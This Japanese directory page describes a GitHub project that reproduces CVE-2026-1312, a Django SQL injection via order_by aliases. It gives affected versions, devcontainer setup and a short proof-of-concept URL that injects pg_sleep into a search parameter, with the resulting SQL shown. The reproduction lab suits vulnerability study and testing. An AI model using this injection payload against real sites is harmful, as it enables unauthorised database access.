Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1312 — CVE-2026-1312(Django SQLインジェクションの脆弱性)を、Docker化された環境とステップバイステップのPoCを用いて再現し、セキュリティテストを実施します。 | Kitploit
ツール/GitHubGitHub/sw0rd1ight/cve-2026-1312
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubsw0rd1ight/cve-2026-1312

CVE-2026-1312

CVE-2026-1312(Django SQLインジェクションの脆弱性)を、Docker化された環境とステップバイステップのPoCを用いて再現し、セキュリティテストを実施します。

リポジトリを見る
226ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-1312 は、危険度の高い Django SQL インジェクションの脆弱性です。QuerySet.order_by() でドットを含む列エイリアスを使用し、FilteredRelation と組み合わせて辞書展開により動的にクエリを構築する際、攻撃者によって悪意のある SQL が注入される可能性があります。

影響を受けるバージョン:

  • Django 6.0 ブランチの 6.0.2 より前のバージョン
  • Django 5.2 ブランチの 5.2.11 より前のバージョン
  • Django 4.2 ブランチの 4.2.28 より前のバージョン

環境の起動

この脆弱性プロジェクトは、vscode の devcontainer を使用して構築されています。

1️⃣ プロジェクトを開く VS Code で既存のプロジェクトのルートディレクトリ(.devcontainer フォルダを含む)を開きます。

2️⃣ コンテナを再度開く(Dev Container の構築)

Ctrl+Shift+P(Windows/Linux)または Cmd+Shift+P(Mac)を押します。

Remote-Containers: Reopen in Container と入力します。

VS Code は .devcontainer 設定を読み取り、コンテナを構築します(初回の構築には数分かかる場合があります)。

⚠️ Dockerfile または依存関係が更新されている場合は、Remote-Containers: Rebuild Container を選択して、最新の環境を使用していることを確認してください。

3️⃣ Django 開発サーバーを実行する

コマンドパレットを開く(Ctrl+Shift+P)

Tasks: Run Task と入力します。

django:start を選択します(タスクは .vscode/tasks.json で設定済み)。

このタスクはコンテナ内で Django 開発サーバーを起動します。

デフォルトでは 0.0.0.0:8086 をリッスンします。

4️⃣ ブラウザを開いてプロジェクトにアクセスする

ブラウザを開いてアクセスします:

http://localhost:8086

5️⃣ 注意事項

初回実行時:

データベースのマイグレーションを実行する必要がある場合があります:

root@kitploit:~
python manage.py migrate

脆弱性の再現

/book/search インターフェースにアクセスします。http://localhost:8086/book/search?name=vuln_book.id,pg_sleep(2)

3秒の遅延が成功することを確認できます。

このとき、django orm の内部でコンパイルされた SQL は次のようになります。

root@kitploit:~
SELECT "vuln_book"."id", "vuln_book"."title", "vuln_book"."author_id" FROM "vuln_book" ORDER BY ("vuln_book".id,pg_sleep(2)) ASC
ツールをダウンロード